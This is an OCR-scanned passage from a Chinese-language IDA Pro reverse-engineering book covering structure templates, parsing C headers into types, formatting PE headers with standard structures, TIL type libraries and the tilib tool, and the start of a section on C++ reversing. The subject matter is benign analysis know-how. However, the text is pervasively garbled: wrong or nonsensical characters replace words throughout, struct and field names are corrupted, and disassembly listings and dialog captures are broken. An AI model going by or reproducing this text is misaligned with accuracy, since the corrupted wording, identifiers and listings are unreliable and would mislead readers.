也 可 以 打开 该 定义 。 


8.2.3 用 栈 帆 作为 专用 结构 体 


你 可 能 已 经 注音 到 , 结构 体 定义 看 起 来 与 函数 的 详细 栈 帧 视图 有 些 类 似 。 这 并 非 巧合 ， 因 为 
在 IDA 内 部 ，IDA 处 理 它们 的 方式 完全 相同 。 它 们 都 属于 相 邻 的 内 存 块 ， 能 够 细 分 成 大 和 干 已 合 
名 字段 ,并 且 每 个 字段 都 拥有 一 个 数 子 仿 移 量 。 它 们 之 间 的 细微 区 别 在 于 , 栈 帧 以 一 个 帧 指针 或 
返回 地 址 为 中 心 ， 同 时 使 用 正 值 和 负 值 字段 侦 移 量 ， 而 结构 体 仅 使 用 正 值 俩 移 量 〈 以 结构 体 开头 
位 置 为 起 始点 )。 


8.3 ”使 用 结构 体 模板 


有 两 种 方法 可 对 反 汇 编 代 码 清单 中 的 结构 体 定 义 加 以 利用 。 首先 , 你 可 以 重新 格式 化 内 存 引 
用 ， 将 类 似 于 [ebx+8] 的 数字 结构 体 偏 移 量 转换 成 诸如 [ebx+ch8_struct .fie1d4] 之 类 的 符号 式 引 
用 ， 从 而 提高 它们 的 可 读 性 。 后 一 种 符号 式 引 用 提供 了 更 多 有 关 引 用 内 容 的 信息 。 因 为 IDA 使 
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用 一 种 层次 表示 法 ,因此 ,你 可 以 清楚 地 知道 ， 程 序 访 问 的 是 什么 类 型 的 结构 体 ， 访 问 的 是 该 结 
构 体 中 的 哪 一 个 字段 。 当 程序 通过 指针 来 引用 结构 体 时 ,， 这 种 应 用 结构 体 模 板 的 技术 最 有 用 。 第 
二 种 应 用 结构 体 模 板 的 方法 是 ， 提 供 其 他 可 应 用 于 栈 和 全 局 变量 的 数据 类 型 。 

为 了 理解 如 何 将 结构 体 定义 应 用 于 指令 操作 数 ， 我 们 把 每 个 定义 看 成 类 似 于 一 组 枚 举 和 常量 。 
例如 ， 图 8-5 中 ch8 struct 的 定义 可 以 用 下 面 的 伪 C 代码 表示 : 














enum 1 
ch8 struct.field1 = 0， 
ch8 struct.field2 = 4, 
ch8 struct.field3 - 6, 
ch8 struct.field4 = 8, 
ch8 struct.field5 - 16 


J; 


对 于 这 样 一 个 定义 ,你 可 将 操作 数 中 使 用 的 任何 常量 值 转换 成 其 对 应 的 符号 形式 。 如 图 8-7 是 
一 个 正在 进行 中 的 此 类 操作 。 内 存 引 用 [ecx+10h] 可 能 访问 的 是 ch8 struct 中 的 field5 字段 。 


















mov [ecx+ch8 struct.field1], 10 
mov [ecx+ch8 struct.field2], 20 
mov [ecx+ch8 struct.field3], 30 
mov [ecx+ch8 struct.field4], 40 
fld ds:dbl 40123E 

fstp qword ptr [ecx*10nhl 





Ak qword ptr [ecx-«CPPEH. RECORD.msEH ptr] 
P1] use standard symbolic constant (Ay [ecx-4ch8, struct.fields] 
Ak qword ptr [ecx4STARTUPINFOA.dwX] 











Del qword ptr [ecx--16] H 


图 8-7 ”应 用 结构 体 偏 移 量 


在 图 8-7 F, At 10h， 即 可 在 上 下 文 菜单 中 看 到 Structure offset ( 结构 体 偏 移 量 ) 选项 ， 它 
提供 3 种 形式 对 指令 操作 数 进 行 格式 化 。 这 3 种 形式 全 部 是 从 包含 一 个 偏 移 量 为 16 的 字段 的 结 
构 体 集合 中 提取 出 来 的 。 

作为 格式 化 内 存 引 用 的 另 一 种 方法 , 可 以 将 栈 和 全 局 变量 格式 化 成 整个 结构 体 。 要 将 栈 变 量 
格式 化 成 结构 体 ， 双 击 该 变量 ， 打 开 详 细 栈 帧 视图 ， 然 后 使 用 Edit » Struct Var ( ALT-Q) 命令 显 
示 一 组 已 知 的 结构 体 ， 如 图 8-8 所 示 。 
ETTET x 















































D dd ? 
-00000014 var 14 dw ? 
-00000012 var 12 db ? 
-00000011 db ? ; undefined 
-00000010 var 10 dd ? 
-0000000C db ? ; undefined 
O000000B db ? ; undcfincd 
-0000000A db ? ; undefined 
-00000009 db ? ; undefined 
-00000008 var 8 dq ? 
x00000000 s db 4 dup(?) 
x00000004 r db 4 dup(?) 
400000008 
[SB++00000000 v| 

b 





图 8-8 ”选择 结构 体 对 话 框 
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选择 其 中 一 个 结构 体 , 可 将 栈 中 对 应 的 字 节 数组 合成 对 应 的 结构 体 类 型 ,并 将 所 有 相关 内 存 
引用 重新 格式 化 成 结构 体 引 用 。 下 面 的 代码 摘自 前 面 分 析 的 栈 分 配 的 结构 体 示例 : 











.text:00401006 mov [ebp+var 18], 10 
. text :0040100D mov [ebp+var 14], 20 
. text :00401013 mov [ebp+var 12], 30 
. text : 00401017 mov [ebp+var 10], 40 
. text :0040101E fld ds:dbl 40B128 

. text : 00401024 fstp [ebp+var 8] 





记得 前 面 得 出 结论 ，var 18 实际 上 是 一 个 大 小 为 24 字 节 的 结构 体 的 第 一 个 字段 。 上 述 代码 
的 详细 栈 帧 如 图 8-9 所 示 。 


-00000018 

-00000018 var 18 

-00000014 var 14 

-00000012 var 12 ? 

-00000011 ? ; undefined 
-00000010 var 10 

-0000000C db ? ; undefined 


O000000B db ? ; undcfincd 


-0000000A db ? ; undefined 
-00000009 db ? ; undefined 
-00000008 ye. dq ? 
x00000000 db 4 dup(?) 

db 4 dup(?) 





[SP---00000000 | 
上 


图 8-9 格式 化 之 前 的 栈 分 配 的 结构 体 
选择 var. 18 并 将 其 格式 化 成 ch8 struct (Edit » Struct Var )， 会 将 以 var 18 开头 的 24 个 字 
"B (ch8 struct 的 大 小 ) 折 革 成 一 个 变量 ， 并 得 到 如 图 8-10 所 示 的 重新 格式 化 后 的 栈 窗口 。 在 
这 个 例子 中 ， 对 var_18 应 用 结构 体 模 板 将 生成 一 条 警告 消息 ， 指 出 在 将 var_18 转换 为 结构 体 的 














-00000018 


-D0000018 var 18 chë struct d 


400000000 s db 4 dup(?) 
+00000004 r db 4 dup(?) 
- 00000008 


[sP--- 00000000 


1 





图 8-10 格式 化 之 后 的 栈 分 配 的 结构 体 
重新 格式 化 之 后 ，IDA 认识 到 ， 任 何 对 分 配给 var_18 的 24 个 字 节 块 的 内 存 引用 ， 都 必须 引 
用 该 结构 体 中 的 一 个 字段 。 如 果 IDA 发 现 这 样 一 个 引用 ， 它 会 尽 一 切 努 力 ， 将 这 个 内 存 引 用 与 
结构 体 变量 中 的 一 个 已 定义 的 字段 关联 起 来 。 在 这 个 特例 中 , 反 汇 编 代码 清单 会 日 动 进行 重新 格 
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式 化 ， 以 合并 结构 体 布局 ， 如 下 所 示 : 


.text:00401006 mov [ebp+var_18.field1], 10 
. text :0040100D mov [ebp+var 18.field2], 20 
. text : 00401013 mov [ebp+var 18.field3], 30 
. text : 00401017 mov [ebp+var 18.field4], 40 
. text :0040101E fld ds:dbl 40B128 

. text:00401024 fstp [ebp+var 18.field5| 


在 反 汇 编 代码 清单 中 使 用 结构 体 表 示 法 的 好 处 在 于 , 它 从 总 体 上 提高 了 反 汇 编 代 码 清单 的 可 
恋 性 。 在 重新 格式 化 后 的 窗口 中 使 用 字段 名 称 ， 能 够 更 加 准确 地 反映 源 代 码 是 如 何 操纵 数据 的 。 

将 全 局 变量 格式 化 成 结构 体 的 过 程 与 格式 化 栈 变 量 所 使 用 的 过 程 几乎 完全 相同 。 要 进行 格式 
化 ， 选 择 要 格式 化 的 变量 ,或 者 表示 结构 体 开头 部 分 的 地 址 ， 青 使 用 Edit » Struct Var ( ALT+Q ) 
选择 合适 的 结构 体 类 型 即 可 。 作 为 针对 未 定义 的 全 局 数据 (不 是 栈 数据 ) 的 备 选 方案 ， 你 可 以 使 
用 IDA 的 上 下 文 菜 单 选择 要 查看 的 结构 体 选项 ， 并 选择 要 应 用 于 所 选 地 址 的 可 用 结构 体 模板 。 


8.4. 导入 新 的 结构 体 


ZAAR IDA 的 结构 体 创 建 和 编辑 功能 后 ， 你 可 能 希望 找到 一 种 更 加 人 简单 的 操作 方法 。 在 
创建 新 结构 体 方面 ，IDA 确实 提供 了 一 些 捷 径 。IDA 能 够 解析 C ( 而 非 C++ ) 数据 声明 ， 以 及 整 
个 C 头 文件 ， 并 目 动 为 在 这 些 声 明 或 头 文件 中 定义 的 结构 体 创 建 对 应 的 IDA 结构 体 。 如 果 你 碰 
巧 拥 有 你 正 进行 逆 回 工程 的 二 进 制 文件 的 源 代 码 ， 或 者 至 少 是 头 文件 ， 那 么 ， 你 就 可 以 让 IDA 
直接 从 源 代码 中 提取 出 相关 结构 体 ， 从 而 节省 大 量 时 间 。 


8.4.1 解析 C 结 构 体 声明 


使 用 View > Open Subviews > Local Types ( 查看 ”打开 子 窗口 本 地 类 型 ) 命令， 可 以 打开 
Local Types 子 窗口 ， 其 中 列 出 了 所 有 解析 到 当前 数据 库 中 的 类 型 。 对 于 新 数据 库 ,， “Local Types" 
窗口 最 初 是 空 的 , 但 是 , 该 窗口 能 够 通过 INSERT 键 或 上 下 文 菜 单 中 的 Insert 选项 解析 新 的 类 型 。 
得 到 的 类 型 输入 对 话 框 如 图 8-11 所 示 。 
































Please enter new type dedaration(s) 





struct ch8 struct f 
int field1 
short field2; 
rhar field3: 
int field4; 
double field5; 
h 


cel | e | 





图 8-11 Local Types 输入 对 话 框 
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解析 新 类 型 时 发 生 的 错误 将 在 IDA. 的 输出 窗口 中 显示 。 如 果 类 型 声明 被 成 功 解 析 ,， “Local 
Types” 徐 口 将 列 出 该 类 型 及 其 相关 声明 ， 如 图 8-12 所 示 。 





Local Types E Xx] 


Ordna |Nam |sze |smc  Desciption 


E 1 chà struct QOQ00014 struct fint fieldi; inti& field2;char field3;int field4;double field5;} 


[E] 





d 








图 8-12 Local Types 窗口 








请 注意 , IDA 解析 荷 使 用 4 字 市 的 默认 结构 体 成 员 对 齐 方式 。 如 果 你 的 结构 体 需 要 其 他 对 齐 方 
式 ， 你 可 以 包括 该 对 齐 方式 ，IDA 认可 使 用 pragma pack 指令 来 指定 所 需 的 结构 体 成 员 对 齐 方 式 。 

添加 到 Local Types ( 本 地 类 型 ) 窗口 中 的 数据 类 型 不 会 立即 在 Structures 1 结构 体 ) 窗口 中 
出 现 。 有 两 种 方法 可 以 将 本 地 类 型 声明 添加 到 Structures 窗口 中 。 最 简单 的 方法 是 在 相关 本 地 类 
型 上 单 击 鼠 标 右键 ， 并 选择 Synchronize to idb。 或 者 ， 由 于 每 个 新 类 型 均 被 添加 到 标准 结构 体 列 
表 中 ， 因 而 也 可 将 新 类 型 导入 到 Structures 窗口 中 ， 如 8.5 d TX. 























8.4.2 解析 C 头 文件 


要 解析 头 文 件 ， 可 以 使 用 File » Load File > Parse C Header File ( 文件 ”加载 文 件 flr C 3k 
文件 ) 选择 你 想 要 解析 的 头 文件 。 如 果 一 切 正常 ，IDA 会 通知 你 Compilation successful ( 编译 完 
成 )。 如 果 解 析 需 遇 到 任何 问题 ，IDA 将 会 在 输出 窗口 中 显示 错误 消息 。 

IDA 会 将 所 有 被 成 功 解析 的 结构 体 添 加 到 当前 数据 库 的 标准 结构 体 列 表 中 (有 具体 地 说 , 是 列 
表 的 末尾 )。 如 果 新 结构 体 的 名 称 与 现 有 结构 体 的 名 称 相 同 ，IDA ZMHpESrZ fA V I5) ler Zi 
构 体 定义 。 除 非 你 明确 选择 添加 新 的 结构 体 ， 和 否则 ， 新 结构 体 不 会 出 现在 Structures 窗口 中 。 我 
们 将 在 8.5 节 讨 论 如 何在 Structures 窗口 中 添加 标准 结构 体 。 

在 解析 C 头 文件 时 ， 记 住 以 下 要 点 会 有 所 帮助 。 

D 虽然 内 置 解析 需 确 实 遵循 pack 杂 注 ， 但 它 不 需要 和 你 的 编译 闫 一样， 默认 对 结构 体 成 员 

进行 对 齐 。 黑 认 情 况 下 ， 解 析 需 会 建立 4 字 节 对 齐 的 结构 体 。 

O 解析 需 理解 C 预 处 理 帮 include 指令 。 为 解析 include 指令 , 解析 融会 搜索 包含 被 解析 文 

件 的 目录 , 以 及 Options * Compiler ( 选项 》 编译 希 ) 配 置 对 话 框 中 的 任何 Include 目录 ( 包 
T) 

O 解析 硕 只 能 理解 C br 20 (Hie. MNT Are PEN ëm "mäh 0 Ze define 指令 和 C 
typedef 语句 。 因此, 如 采 解 析 需 之 前 遇 到 过 适当 的 typedef, 它 将 能 够 正确 解析 unit32 t 
之 类 的 类 型 。 

O 如 果 你 没有 源 代 码 ， 那 么 你 会 发 现 ， 使 用 文本 编辑 融 以 C 表示 法 迅速 定义 一 个 结构 体 布 
局 ， 并 解析 得 到 的 头 文件 或 把 声明 粘贴 为 一 个 新 的 本 地 类 型 ， 会 比 使 用 IDA 烦琐 的 手动 
结构 体 定 义工 具 更 加 方便 。 
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口 只 有 当前 数据 库 能 够 使 用 新 创建 的 结构 体 。 如 果 想 要 在 其 他 数据 库 中 使 用 新 结构 体 ， 你 
必须 重新 创建 该 结构 体 。 在 本 章 后 面 讨论 TIL 文件 时 ， 我 们 将 讨论 一 些 简化 上 述 步 又 的 
方法 。 

一 般 而 言 , 要 最 大 限度 地 提高 成 功 解析 一 个 头 文件 的 几率 , 你 需要 使 用 标准 C 数 据 类 型 ,并 

尽 可 能 地 减少 使 用 include 文件 ,从 而 最 大 程度 地 简化 结构 体 定义 。 记 住 , 在 IDA 中 创建 结构 体 

时 ， 正 确 布局 最 为 重要 。 正 确 的 布局 更 多 地 取决 于 每 个 字段 的 正确 大 小 和 结构 体 的 正确 对 齐 ， 而 

不 只 是 对 每 个 字段 都 使 用 正确 的 类 型 。 换 句 话说， 如 果 你 需要 用 int 替换 所 有 的 unit32 t, DAE 

确 解析 一 个 文件 ， 那 么 ， 就 请 立即 这 样 做 吧 | 


8.5 ”使 用 标准 结构 体 


如 前 所 述 , IDA 能 够 识别 大 量 与 各 种 库 和 API 函数 有 关 的 数据 结构 ,最初 创建 一 个 数据 库 时 ， 
IDA 会 尝试 确定 与 二 进 制 文 件 有 关 的 编译 需 和 平台 ， 并 加 载 适 当 的 结构 体 模 板 。 当 IDA 在 反 汇 
编 代 码 清 单 中 操纵 结构 体 时 ， 它 会 在 Structures 窗口 中 添加 相应 的 结构 体 定义 。 因 此 ，Structures 
窗口 中 显示 的 是 应 用 于 当前 二 进 制 文件 的 已 知 结构 体 的 子 集 。 除了 创建 日 定 义 结构 体外 ,你 还 可 
以 从 IDA 的 已 知 结构 体 列 表 中 提取 出 其 他 标准 结构 体 ， 并 将 其 添加 到 Structures 窗口 中 。 

要 添加 一 个 新 结构 体 , 首先 , 在 Structures 窗口 中 按 下 INSERT 键 ,在 图 8-3 的 Create structure/ 
union 对 话 框 中， 包含 一 个 Add standard structure ( 添加 标准 结构 体 ) 按钮 。 单 击 这 个 按钮 ，IDA 
将 显示 与 当前 编译 咒 (在 分 析 阶 段 检测 出 来 ) 和 文件 格式 有 关 的 结构 体 主 列表 。 这 个 结构 体 主 列 
表 中 还 包含 通过 解析 C 头 文件 添加 到 数据 库 中 的 结构 体 。 选 择 结构 体 对 话 框 如 图 8-13 所 示 , 该 对 
话 框 用 于 选择 添加 到 Structures 窗口 中 的 结构 体 。 


t Please choose a structure j - | 口 | x] 
Type name 


a IMAGE DATA, DIRECTORY struct IMAGE DATA DIRECTORY MS SDK (Windows XP) 
Ka IMAGE DEBUG DIRECTORY struct IMAGE DEBUG DIRECTORY MS SDK (Windows XP) O 































IMAGE DEBUG INFORMATION struct IMAGE DEBUG INFORMATION MS SDK (Windows XP) 
(ba IMAGE DEBUG MISC struct. IMAGE DEBUG MISC MS SDK (Windows XP) 
| ba IMAGE DOS HEADER struct. IMAGE DOS HEADER MS SDK (Windows XP) 
| ba IMAGE EXPORT. DIRECTORY struct. IMAGE EXPORT DIRECTORY MS SDK (Windows XP) 
(ba IMAGE FILE HEADER struct IMAGE FILE HEADER MS SDK (Windows XP) ` e 
! f 
Cancel | Search | Help | 


Line 6517 of 28539 E 





图 8-13 ”选择 标准 结构 体 





你 可 以 利用 搜索 功能 ， 根 据 部 分 文本 匹配 来 定位 结构 体 。 该 对 话 框 还 允许 你 进行 前 组 匹配 。 
如 果 你 知道 某 个 结构 体 名 称 的 前 几 个 字符 ， 只 需 输 入 这 几 个 字符 (它们 将 出 现在 对 话 框 底部 的 状 
态 栏 上 )， 列 表 和 窗口 将 跳 转 到 第 一 个 与 这 个 前 级 匹配 的 结构 体 。 选 择 一 个 结构 体 ， 该 结构 体 及 任 
何 藤 套 结构 体 都 将 添加 到 Structures 窗口 中 。 





8.5 使 用 标准 结构 体 Il 


下 面 举例 说 明 如 何 使 用 标准 结构 体 。 假 如 你 想 要 分 析 一 个 Windows PE 二 进 制 文件 的 文件 头 。 
默认 情况 下 ， 在 创建 后 ， 文 件 头 不 会 立即 加 载 到 数据 库 中 。 但 是 ， 如 果 你 在 最 初创 建 数 据 库 时 选 
择 Manual load ( 手动 加 载 ) 选项 ， 丈 可 以 将 文件 头 加 载 到 数据 库 中 。 加 载 文件 头 可 确保 只 有 与 这 
些 头 部 有 关 的 数据 类 型 才 出 现在 数据 库 中 。 多 数 情 况 下 ， 文 件 头 不 会 以 任何 形式 被 格式 化 ， 因 为 
通 销 程 序 并 不 会 直接 引用 它们 上 自己 的 文件 头 。 因 此 , 分 析 器 也 没有 必要 对 文件 头 应 用 结构 体 模 板 。 

对 一 个 PE 二 进 制 文件 进行 一 番 人 研究 后 ， 你 会 发 现 ，PE 文件 的 开头 部 分 是 一 个 名 为 
IMAGE DOS HEADER 的 MS-DOS 头 部 结构 体 。 另 外 ，IMAGE_D0S_ HEADER 中 的 数据 指 回 一 个 
IMAGE NE HEADER 结构 体 的 位 置 。 它 详细 说 明了 PE 二 进 制 文 件 的 内 存 布局 。 选 择 加 载 PE 头 部 ， 
你 将 看 到 类 似 于 下 面 的 未 格式 化 的 反 汇编 代码 清单 。 了 解 PE 文件 结构 的 读者 会 发 现 ， 文 件 的 前 
两 个 字 节 是 我 们 熟悉 的 MS-DOS SIE MZ. 
































HEADER:00400000  ImageBase db 4Dh; M 


HEADER : 00400001 db 5Ah ; Z 
HEADER : 00400002 db 90h ; É 
HEADER - 00400003 db 0 
HEADER : 00400004 db 3 
HEADER : 00400005 db 0 
HEADER : 00400006 db 0 
HEADER : 00400007 db 0 
HEADER : 00400008 db 4 
HEADER :00400009 db 0 
HEADER :0040000A db 0 
HEADER :0040000B db 0 
HEADER : 0040000C db oFFh 
HEADER : 0040000D db oFFh 
HEADER : 0040000E db 0 
HEADER : 0040000F db 0 





格式 化 这 个 文件 时 ， 你 需要 一 些 PE 文件 参考 文档 帮助 你 了 解 每 一 种 数据 类 型 。 通 过 使 用 结构 
体 模板 ，IDA 可 以 将 这 些 字 节 格 式 化 成 一 个 IMAGE DOS HEADER 结构 体 ， 使 这 些 数据 更 加 有 用 。 第 一 
步 是 根据 上 面 的 详细 说 明 , 添加 标准 的 IMAGE DOS HEADER 结构 体 (你 可 以 在 打开 IMAGE NT HEADER 结 
构 体 的 同时 添加 该 结构 体 )。 第 二 步 是 使 用 Edit》 Struct Var ( ALT+Q ), 将 从 ImageBase 开始 的 字 节 
转换 成 一 个 IMAGE DOS HEADER 结构 体 。 这 样 ， 即 得 到 下 面 的 格式 化 代码 : 

HEADER:00400000 ImageBase IMAGE DOS HEADER «5A4Dh, 90h, 3, O, 4, O, OFFFFh, O, OB8h, \ 


HEADER : 00400000 0, 0, O, 40h, O, O, O, O, O, 80h» 
HEADER:00400040 db OEh 


如 你 所 见 ， 文 件 的 前 64 COx40) 个 字 节 已 被 折 友 成 一 个 数据 结构 ， 其 类 型 也 在 反 汇 编 代 码 
清单 中 注 明 。 但 是 ,除非 你 对 这 个 特殊 的 结构 体 非 常熟 悉 ， 否则 ， 你 仍然 无 法 清楚 了 解 其 中 每 个 
字段 的 意义 。 不 过 ,我 们 可 以 展开 结构 体 ， 使 操作 更 进一步 。 打 开 一 个 结构 体 的 数据 项 时 ，IDA 
会 使 用 结构 体 定义 中 对 应 的 字段 名 称 , 对 每 个 字段 进行 注释 。 使 用 数字 键盘 上 的 加 号 键 可 以 打开 
折 县 后 的 结构 体 。 打 开 后 的 结构 体 如 下 所 未 : 
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HEADER :00400000  ImageBase dw 5A4Dh ; e magic 
HEADER : 00400000 dw 90h ; e cblp 
HEADER : 00400000 dw 3 ;ecp 
HEADER :00400000 dw 0 ; e cric 
HEADER : 00400000 dw 4 ; e cparhdr 
HEADER : 00400000 dw 0 ; e minalloc 
HEADER : 00400000 dw OFFFFh ; e maxalloc 
HEADER : 00400000 dw 0 ; ess 
HEADER : 00400000 dw OB8h ; e sp 
HEADER : 00400000 dw 0 ; e csum 
HEADER : 00400000 dw 0 ; eip 
HEADER : 00400000 dw 0 ecs 
HEADER : 00400000 dw 40h ; e lfarlc 
HEADER : 00400000 dw O ; e ovno 
HEADER : 00400000 dw 4 dup(0) ; e res 
HEADER : 00400000 dw O ; e oemid 
HEADER : 00400000 dw 0 ; e oeminfo 
HEADER : 00400000 dw OAh dup(0) ; e res2 
HEADER : 00400000 € dd 80h ; e lfanew 
HEADER : 00400040 db oFEh 





然而 ，IMAGE_D0S_HEADER 的 字段 并 没有 特别 有 意义 的 名 称 ， 因 此 ， 我 们 在 查阅 PE 文件 参考 
文献 后 才 知 道 : 上 处 的 e_1fanew 字段 表示 文件 偏 移 量 , 在 该 位 置 可 找到 IMAGE_NT_HEADER 结构 体 。 
应 用 前 面 讨论 的 所 有 步 又 ， 在 地 址 00400080 (数据库 中 的 第 0x80 FI ) 处 创建 一 个 IMAGE_NT_ 
HEADER 结构 体 ， 将 得 到 如 下 所 示 的 格式 化 后 的 结构 体 〈 仅 显示 一 部 分 代码 ): 





HEADER : 00400080 dd 4550h ; Signature 

HEADER : 00400080 dw 14Ch ; FileHeader.Machine 

HEADER : 00400080 € dw 5 ; FileHeader.NumberOfSections 

HEADER: 00400080 dd 4789ADF1h ; FileHeader.TimeDateStamp 

HEADER : 00400080 dd 1400h ; FileHeader.PointerToSymbolTable 
HEADER : 00400080 dd 14Eh ; FileHeader.NumberOfSymbols 

HEADER: 00400080 dw OEOh ; FileHeader.SizeOfOptionalHeader 
HEADER : 00400080 dw 307h ; FileHeader.Characteristics 

HEADER : 00400080 dw 10Bh ; OptionalHeader.Magic 

HEADER : 00400080 db 2 ; OptionalHeader.MajorlLinkerVersion 
HEADER : 00400080 db 38h ; OptionalHeader.MinorlinkerVersion 
HEADER : 00400080 dd 800h ; OptionalHeader.SizeOfCode 

HEADER: 00400080 dd 800h ; OptionalHeader.SizeOfInitializedData 
HEADER: 00400080 dd 200h ; OptionalHeader.SizeOfUninitializedData 
HEADER : 00400080 dd 1000h ; OptionalHeader.AddressOfEntryPoint 
HEADER : 00400080 dd 1000h ; OptionalHeader.BaseOfCode 

HEADER : 00400080 dd 2000h ; OptionalHeader.BaseOfData 

HEADER : 00400080 dd 400000h ; OptionalHeader.ImageBase 

可 见 ， 这 里 的 字段 名 称 更 有 意义 。 我 们 立即 发 现 ， 该 文件 由 5 个 部 分 (4@ ) 构成 ,应 该 是 在 








虚拟 地 址 00400000 ( @ ) 被 加 载 到 内 存 中 。 使 用 数字 键盘 上 的 减 号 键 ， 可 以 将 打开 状态 的 结构 体 
Fd SUPER c 


86 IDATIL 文件 — 123 


8.6 IDA TIL 文件 


IDA 中 的 所 有 数据 类 型 和 函数 原型 信息 都 存储 在 TIL 文件 中 。IDA 拥有 存储 在 <IDADIR>/til 
目录 中 的 许多 主要 编译 右 和 API 的 类 型 库 信 息 。Types 窗口 ( View Open subview > Type Libraries ) 
列 出 了 当前 加 载 的 . 弓 文 件 ， 并 可 用 于 加 载 你 想 要 使 用 的 其 他 . 乌 文 件 。IDA 将 根据 在 分 析 阶 段 发 
现 的 二 进 制 文件 属性 ， 目 动 加 载 类 型 库 。 正 篆 情 况 下 ， 多 效用 户 不 需要 直接 处 理 . 包 文 件 。 


8.6.1 加载 新 的 TIL 文 件 


有 时 候 , IDA 可 能 无 法 检测 到 用 于 构建 某 个 二 进 制 文件 的 特 丈 编 详 禹 , 这 可 能 是 由 于 该 二 进 制 
文件 经 过 茶 种 形式 的 模糊 处 理 所 致 。 这 时 ， 你 可 能 需要 在 Types 窗口 中 按 下 INSERT 键 ， 并 选择 你 
想 要 加 载 的 . 包 文 件 。 加 载 一 个 新 的 . 乌 文 件 后 ， 该 文件 包含 的 所 有 结构 体 定 义 都 被 添加 到 标准 结构 
体 列表 中 ， 其 类 型 信息 也 被 应 用 于 二 进 制 文 件 中 的 某 些 函数 ， 这 些 函 数 可 在 新 加 载 的 . 包 文件 中 找 
到 匹配 的 原型 。 换 句 话 说, —H IDA 获知 与 某 个 函数 有 关 的 新 信息 ， 它 就 会 自动 应 用 这 些 新 信息 。 



































8.6.2 ”共享 TIL 文 件 


IDA 还 利用 . 弓 文 件 存储 你 在 Structures 窗口 中 手动 创建 的 或 者 通过 解析 C 头 文件 获得 的 任何 
自 定 义 结构 体 定义 。 这 些 结构 体 存储 在 一 个 与 创建 它们 的 数据 库 有 关 的 专用 .til 文件 中 。 该 文件 
的 名 称 与 其 相关 数据 库 的 名 称 相 同 ， 扩 展 名 为 .tl。 人 例如， 如果 数据 库 名 为 some file.idb， 则 相应 
的 类 型 库 文件 则 为 some_file.til。 在 正常 情况 下 ， 你 根本 不 会 看 到 这 个 文件 ， 除 非 你 碰巧 在 IDA 
中 打开 了 上 述 数据 库 。 前 面 我 们 提 到 过 ，.idb 文件 实际 上 是 一 个 归档 文件 〈 类 似 于 .tar 文件 )， 用 
于 保存 不 使 用 的 数据 库 组 件 。 打 开 一 个 数据 库 时 ， 其 组 件 文 件 〈.t 文件 为 其 中 之 一 ) 将 被 提取 
出 来 ， 成 为 IDA 中 的 运行 文件 。 

有 关 如 何在 数据 库 之 间 共 享 . 弓 文 件 的 讨论 , 请 访问 http:/www.hex-rays.com/forum/viewtopic. 
php? 伍 6&t=986"。 有 两 种 共享 方法 。 第 一 种 方法 有 些 不 太 正 规 ， 即 将 .ti 文件 由 打开 的 数据 库 复 
制 到 为 一 个 目录 中 , 然后 再 通过 Types 窗口 ,在 任何 其 他 数据 库 中 打开 这 个 . 蕊 文件 。 第 二 种 是 一 
种 正式 的 方法 ， 即 从 一 个 数据 库 中 提取 出 自 定 义 类 型 信息 ， 生 成 一 段 IDC 脚本 ， 用 于 在 任何 其 
他 数据 库 中 重建 自 定 义 结 构 体 。 使 用 File » Produce File » Dump Type. into to IDC File (文件 ， 生 
成 文件 ，》 转 储 类 型 信息 到 IDC 文件 ) 命令 可 生成 该 脚本 。 但 是 ， 与 第 一 种 方法 不 同 的 是 ， 这 种 
方法 只 能 转 储 Structures 窗口 中 列 出 的 结构 体 ， 但 并 不 转 储 通过 解析 C 头 文件 得 到 的 结构 体 〈 而 
复制 . 包 文 件 却 可 以 转 储 这 类 结构 体 )。 

Hex-Rays 还 提供 一 个 名 为 tilib 的 独立 工具 ， 用 于 在 IDA 以 外 创建 . 乌 文 件 。 注 册 用 户 可 以 
通过 Hex-RaysIDA 下 载 页 面 下 载 该 实用 工具 的 .zip 文件 。 要 安装 这 个 工具 ， 只 需要 将 .zip 文件 解 
压 到 <IDADIR> 目 录 中 即 可 。tilib 实用 工具 可 用 于 列举 现 有 . 世 文件 的 内 容 ， 或 通过 解析 C ( 而 
不 是 C++ ) 头 文件 来 创建 新 的 . 包 文 件 。 下 面 的 命令 将 列举 Visual Studio 6 类 型 库 的 内 容 : 



























































(D 这 个 链接 只 有 已 注册 用 户 才能 访问 。 
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C:\Program FilesMIdaPro»tilib -1 til\pc\vc6win.til 
创建 新 的 . 乌 文 件 包 括 命名 要 解析 的 头 文 件 及 要 创建 的 . 锯 文件 .你 可 以 使 用 命令 行 选 项 来 指定 其 


他 包含 文件 目录 或 之 前 解析 的 . 弓 文 件 ， 以 解析 头 文件 中 包含 的 任何 依赖 关系 。 下 面 的 命令 将 创建 一 
个 包含 ch8 struct 声明 的 新 . 乌 文 件 。 生 成 的 .位 文件 必须 移 至 <IDADIR>/Mtil 目录 才能 供 IDA 使 用 。 











C:\Program FilesMIdaPro»tilib -c -hch8 struct.h ch8.til 


tilib 实用 工具 包含 大 量 其 他 功能 ,tilib 工具 随 附 的 README 文件 详细 介绍 了 其 中 一 些 功 
能 ,通过 运行 不 市 参数 的 廿 1ib 命令 可 简单 了 解 其 他 功能 。 在 版 本 6.1 之 前 ,tilib 仅 提 供 Windows 
可 执行 文件 ， 但 是 它 生 成 的 . 弓 文 件 可 与 所 有 版 本 的 IDA 兼容 。 


8.7 ”C++ 逆 回 工程 基础 


C++ 类 是 C 结 构 体 面向 对 象 的 扩展 ， 因 此 ， 在 结束 数据 结构 的 讨论 时 ,我 们 有 必要 介绍 一 下 
已 编译 的 C++ 代 码 的 各 种 特性 。 CHER HE E A Z8, 详细 介绍 这 个 主题 并 不 属于 本 书 的 讨论 范围 。 
在 这 里 ， 我 们 仅仅 涉及 几 个 重要 问题 ， 以 及 微软 的 Visual C++ 和 GNU 的 g++ 之 间 的 一 些 差 寞 。 

有 一 点 需要 特别 记 住 , TEBISEJS C++ 语言 的 基础 知识 , 对 于 你 理解 已 编 详 C++ 代码 将 大 有 人 神 
益 。 在 源 代 码 层 次 上 完全 营 握 继 涉 和 多 态 等 面 加 对象 的 概念 会 非常 困难 。 答 斌 在 汇编 语言 层次 上 
深入 这 些 概念 ， 但 却 不 了 解 它 们 在 源 代 码 层次 上 的 意义 ， 坚 无 疑问 ， 你 会 陷入 困 境 。 














8.7.1 this 指针 


MAJERS CHIRN RAABE this 指针 。 任何 时 候 调 用 这 样 一 个 函数 , this 都 被 初始 化 ， 
指 咎 用 于 调用 该 孙 数 的 对 象 。 以 下 面 的 函数 调用 为 例 : 





//object1, object2, and *p obj are all the same type. 
objecti.member func(); 

object2.member func(); 

p obj-»member func(); 


